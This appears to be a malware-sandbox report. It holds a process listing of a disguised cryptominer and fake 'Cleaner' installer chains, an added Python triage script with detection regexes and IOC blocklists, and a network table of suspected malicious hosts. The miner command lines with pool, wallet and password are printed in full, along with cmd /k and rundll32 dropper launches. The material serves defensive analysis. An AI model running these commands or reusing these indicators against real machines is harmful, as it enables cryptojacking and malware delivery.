C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_DB9D.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,8609340544729182858,7197310448729736908,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4660 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ffa1a8edec0,0x7ffa1a8eded0,0x7ffa1a8edee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1b8,0x1bc,0x1c0,0x190,0x1c4,0x7ff6e7f59e70,0x7ff6e7f59e80,0x7ff6e7f59e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --mojo-platform-channel-handle=1760 /prefetch:8
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --mojo-platform-channel-handle=2280 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2592 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2440 /prefetch:1
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3172 /prefetch:2
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --mojo-platform-channel-handle=1944 /prefetch:8
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,3075459249370475221,11448871697927387722,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1176_982255084" --mojo-platform-channel-handle=3480 /prefetch:8
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
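A triage pass over the flattened process listing above. This is an added example, not part of the sandbox report, and its rules are not the sandbox's own signatures. The input format is the report's: each process is an image path on one line followed by its full command line on the next. SAMPLE_LISTING is a short excerpt copied from the listing (two long command lines are shortened); the rule names, the "user-writable path" heuristic and the miner-flag regexes are this example's assumptions.

```python
"""
Triage pass over a flattened sandbox process listing.

Added example; not part of the sandbox report. Input format: alternating
lines of image path and full command line, as in the report above.
"""
import re
from typing import List, NamedTuple, Tuple

# Constructed excerpt of the listing above (two command lines shortened).
SAMPLE_LISTING = r"""
C:\ProgramData\Systemd\Database.exe
-epool etc.2miners.com:1010 -ewal 0x1E07BFe762d6326D15539277bE7f4E7d7054004f -worker Hesoyam -epsw Hesoyam2281337
C:\ProgramData\Data\Database.exe
-epool eth-eu1.nanopool.org:9999 -ewal 0x49D4468FB0205F38d102236C33ad424764Fe94C8 -worker Hesoyam -epsw Hesoyam2281337 -mode 1 -Rmode 1 -coin eth -acm"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\54u0kgsf.k5i\GcleanerEU.exe /eufive & exit
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --nwjs --renderer-client-id=6 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s BITS
"""


class Finding(NamedTuple):
    image: str
    rule: str
    detail: str


# Heuristic (assumption): directories a standard user can write to.
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Temp)\\", re.I)
# Flags used by Claymore/PhoenixMiner-family Ethash miners (seen on Database.exe above).
MINER_POOL = re.compile(r"(?:^|\s)-epool\s+(\S+)")
MINER_WALLET = re.compile(r"(?:^|\s)-ewal\s+(\S+)")
# rundll32 <dll>,<export>
RUNDLL32_EXPORT = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)"?\s*,\s*(\w+)', re.I)
# cmd /k <dropped exe> ... & exit : the launcher pattern repeated in the listing.
CMD_K_DROP = re.compile(r'cmd\.exe"?\s+/k\s+(\S+\.exe)\b.*&\s*exit\s*$', re.I)
# name.exe.com style double extensions on the image path.
DOUBLE_EXT = re.compile(r"\.(?:exe|scr|pif)\.(?:com|exe|scr)$", re.I)


def parse_listing(text: str) -> List[Tuple[str, str]]:
    """Split the listing into (image path, command line) pairs."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("listing must alternate image path / command line")
    return list(zip(lines[0::2], lines[1::2]))


def triage(text: str) -> List[Finding]:
    """Run every rule over every process; one Finding per rule hit."""
    findings: List[Finding] = []
    for image, cmdline in parse_listing(text):
        m = MINER_POOL.search(cmdline)
        if m:
            w = MINER_WALLET.search(cmdline)
            findings.append(Finding(image, "miner_cmdline",
                                    f"pool={m.group(1)} wallet={w.group(1) if w else '?'}"))
        m = RUNDLL32_EXPORT.search(cmdline)
        if m and USER_WRITABLE.search(m.group(1)):
            findings.append(Finding(image, "rundll32_userwritable_dll", f"{m.group(1)}!{m.group(2)}"))
        m = CMD_K_DROP.search(cmdline)
        if m:
            findings.append(Finding(image, "cmd_k_dropper", m.group(1)))
        if "--no-sandbox" in cmdline.split() and USER_WRITABLE.search(image):
            findings.append(Finding(image, "chromium_no_sandbox", "renderer/GPU sandbox disabled"))
        if DOUBLE_EXT.search(image):
            findings.append(Finding(image, "double_extension_image", image.rsplit("\\", 1)[-1]))
    return findings


def miner_iocs(text: str) -> Tuple[List[str], List[str]]:
    """Unique pool endpoints and wallet addresses, ready for a blocklist."""
    pools, wallets = set(), set()
    for _, cmdline in parse_listing(text):
        m = MINER_POOL.search(cmdline)
        if m:
            pools.add(m.group(1))
            w = MINER_WALLET.search(cmdline)
            if w:
                wallets.add(w.group(1))
    return sorted(pools), sorted(wallets)


if __name__ == "__main__":
    for f in triage(SAMPLE_LISTING):
        print(f"{f.rule:28} {f.image}\n{'':28} {f.detail}")
    print(miner_iocs(SAMPLE_LISTING))
```

The rules deliberately key on the command line rather than the file name: Database.exe is a generic name, but `-epool`/`-ewal` with a pool host and a 0x-prefixed wallet is unambiguous, and the pool and wallet are the indicators worth pivoting on across other samples. The `cmd.exe /k <Temp exe> & exit` shape and `rundll32 <Temp dll>,<export>` are likewise cheap to match in EDR command-line telemetry and survive renaming of the dropped files.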
Network
| Country | Destination | Domain | Proto |
| N/A | 20.73.194.208:443 | | tcp |
| N/A | 40.126.31.8:443 | | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | | tcp |
| N/A | 20.189.118.208:80 | | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.166:443 | api.db-ip.com | tcp |
| N/A | 104.26.4.15:443 | api.db-ip.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 8.8.8.8:53 | i.spesgrt.com | udp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 8.8.8.8:53 | hockeybruinsteamshop.com | udp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 52.219.64.115:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 52.219.64.115:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 185.206.215.216:80 | | tcp |
| N/A | 193.56.146.22:26336 | | tcp |
| N/A | 185.186.142.245:22850 | | tcp |
| N/A | 188.124.36.242:25802 | | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 52.219.66.68:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.66.68:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 152.32.151.93:80 | 152.32.151.93 | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 31.13.71.36:443 | www.facebook.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 52.219.156.26:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.156.26:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.86.82:80 | swretjhwrtj.gq | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 185.230.143.48:14462 | tcp | |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 104.18.21.226:80 | crl.globalsign.com | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
